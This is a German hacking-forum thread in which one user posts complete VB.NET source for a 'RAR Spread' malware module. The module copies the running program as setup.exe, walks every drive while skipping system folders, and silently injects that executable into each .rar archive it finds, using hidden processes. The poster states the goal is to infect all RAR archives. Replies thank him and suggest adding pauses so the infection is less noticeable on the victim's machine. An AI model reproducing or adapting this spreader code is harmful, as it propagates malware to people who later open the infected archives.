Ergebnis 1 bis 10 von 10
  1. #1
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard [VB.NET] RAR Spread *Funktioniert auch unter Vista/7*

    [hide]
    Code:
    'by hackerking
    Public Class Archive
            Shared RarPath As String = "rar.exe"
    
            Public Shared Sub Spread()
                If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) & "\WinRar\Rar.exe") Then
                    RarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) & "\WinRar\Rar.exe"
                    If File.Exists(Application.StartupPath & "\rar.exe") Then Kill(Application.StartupPath & "\rar.exe")
                    File.Copy(RarPath, Application.StartupPath & "\rar.exe")
                    RarPath = Application.StartupPath & "\rar.exe"
                ElseIf File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Replace(" (x86)", "") & "\WinRar\Rar.exe") Then
                    RarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Replace(" (x86)", "") & "\WinRar\Rar.exe"
                    If File.Exists(Application.StartupPath & "\rar.exe") Then Kill(Application.StartupPath & "\rar.exe")
                    File.Copy(RarPath, Application.StartupPath & "\rar.exe")
                    RarPath = Application.StartupPath & "\rar.exe"
                Else
                    Exit Sub
                End If
    
                If File.Exists(Application.StartupPath & "\setup.exe") Then Kill(Application.StartupPath & "\setup.exe")
                File.Copy(Application.ExecutablePath, Application.StartupPath & "\setup.exe")
                Dim Drives() As String = Environment.GetLogicalDrives
                For Each sDrive As String In Drives
                    SearchForArchive(sDrive)
                Next
            End Sub
    
            Private Shared Sub SearchForArchive(ByVal sPath As String)
                Try
                    If sPath = Directory.GetDirectoryRoot(sPath) & "archive_db" Or sPath = Directory.GetDirectoryRoot(sPath) & "Intel" Or sPath = Directory.GetDirectoryRoot(sPath) & _
                        "NVIDIA" Or sPath = Directory.GetDirectoryRoot(sPath) & "PerfLogs" Or sPath = Directory.GetDirectoryRoot(sPath) _
                        & "Windows" Or sPath = Directory.GetDirectoryRoot(sPath) & "Windows.old" Or sPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) _
                        Or sPath = Environment.GetFolderPath(Environment.SpecialFolder.Programs) Or sPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles) _
                        Or sPath = Directory.GetDirectoryRoot(sPath) & "$Recycle.Bin" Or sPath = Directory.GetDirectoryRoot(sPath) & "Boot" Or sPath = Directory.GetDirectoryRoot(sPath) _
                        & "Config.Msi" Or sPath = Directory.GetDirectoryRoot(sPath) & "System Volume Information" Or sPath = Directory.GetDirectoryRoot(sPath) & "Program Files" Or _
                        sPath = Directory.GetDirectoryRoot(sPath) & "Program Files (x86)" Then
                        Exit Sub
                    End If
    
                    Dim Files As String() = Directory.GetFiles(sPath)
                    For Each File As String In Files
                        Try
                            If Path.GetExtension(File) = ".rar" Then
                                InjectArchive(File)
                            End If
                        Catch
                        End Try
                    Next
                    Dim SubDirs As String() = Directory.GetDirectories(sPath)
                    For Each SubDir As String In SubDirs
                        SearchForArchive(SubDir)
                    Next
                Catch
                End Try
            End Sub
    
            Private Shared Sub InjectArchive(ByVal sArchive As String)
                Try
                    Dim psi As New ProcessStartInfo With {.Arguments = " a " & sArchive & " setup.exe",  .FileName = RarPath}
                    With psi
                        .CreateNoWindow = True
                        .WindowStyle = ProcessWindowStyle.Hidden
                        Process.Start(psi)
                        psi = Nothing
                    End With
                Catch
                End Try
            End Sub
        End Class
    [/hide]

    ein thx tut nicht weh
    ps:
    die klasse funktioniert unter xp/vista/7
    aber nicht mit zip datein

    ps2:
    ordentlich nää

    edit//
    gibt ein paar kleinigkeiten die verbessert werden könnten. (using, with etc.)
    aber dass könnt ihr ja selber machen
    Geändert von hackerking (26.09.2010 um 16:06 Uhr)

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    c-Jay (08.10.2010), xzibitsebi (25.08.2010), _nobby_ (16.08.2010)

  3. #2
    W32.FunLove
    Registriert seit
    09.08.2010
    Beiträge
    149

    Standard

    ok funtz aber erst nach verschicken der datei^^ OoO
    danke

  4. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    ocz (06.09.2010)

  5. #3
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Nach verschicken der Datei?
    Was meinste damit?

  6. #4
    W32.FunLove
    Registriert seit
    09.08.2010
    Beiträge
    149

    Standard

    naja also erstmal is der code viel zu agessiv...

    ich mein fällt ja nicht auf das dein PC einem Düsenjet gleicht oder? XD
    naja dann geht das ihrgentwie erst sobald eine Datei "aktivert wird" oder ihrgentwie nach 10 min ...?

    Versteh das ja auch nit ganz warum und so ... is ihrgentwie dennoch komisch...^^

    Sonst finde ich es ganz jut zum modden...

  7. #5
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    oO?
    Was laberst du von aggressiv?
    Die Aufgabe ist, alle RAR-Archive zu infizieren (eine Exe-Datei anhängen)

    Und dafür braucht man keinen guten Rechner. Jeder wird das hinkriegen... Es werden die größten Verzeichnisse (ProgramFiles und der ganze Müll wo niemand reinguckt) eh nicht infiziert.. Bei mir brauchte die Datei unter 12 GB RAM ohne einen Datei Cache knapp 2 Minuten..

  8. #6
    W32.FunLove
    Registriert seit
    09.08.2010
    Beiträge
    149

    Standard

    naja meinte das es laut ist...

    meine festplatte hat plötzlich voll druchgedreht...

    vill ne pause von 50 millisekunden einbauen..^^
    (des meinte ich mit agressiv^^)

  9. #7
    Anfänger
    Registriert seit
    12.09.2010
    Beiträge
    29

    Standard

    jo wäre nett
    wenn man einen laptop hatt dauerd das ja ewig *-*

  10. #8
    Capt'n Crunch
    Registriert seit
    10.07.2008
    Beiträge
    999

    Standard

    das ist aber doch nicht seine aufgabe... er hat den code dafür "veröffentlicht" und nicht die funktion um das möglichst unauffällig zu tun
    bitcoin. Banking Is Necessary. Banks Are Not. - by Lincoln6Echo

    Das ganze Mysql usw is mir zu viel arbeit um es zu lernen

  11. #9
    W32.FunLove
    Registriert seit
    09.08.2010
    Beiträge
    149

    Standard

    Ja... aber is nur so nen verbesserungs vorschlag^^
    habs für mich gemoddet^^

    FETTES THX

  12. #10
    DateMake Dialer
    Registriert seit
    23.08.2010
    Beiträge
    104

    Standard

    Sieht ganz nett aus, danke für die release

Ähnliche Themen

  1. [S] Alternative zu Sandboxie, die auch unter Vista x64 läuf
    Von bLaCk.LiGhT im Forum Anwendungssoftware
    Antworten: 0
    Letzter Beitrag: 24.08.2008, 15:17
  2. Antworten: 3
    Letzter Beitrag: 28.11.2007, 20:13
  3. Vernünftiger ICQ 5.1 IP Sniffer der auch funktioniert??
    Von Lidloses_Auge im Forum Instant Messaging
    Antworten: 0
    Letzter Beitrag: 05.02.2007, 16:31

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •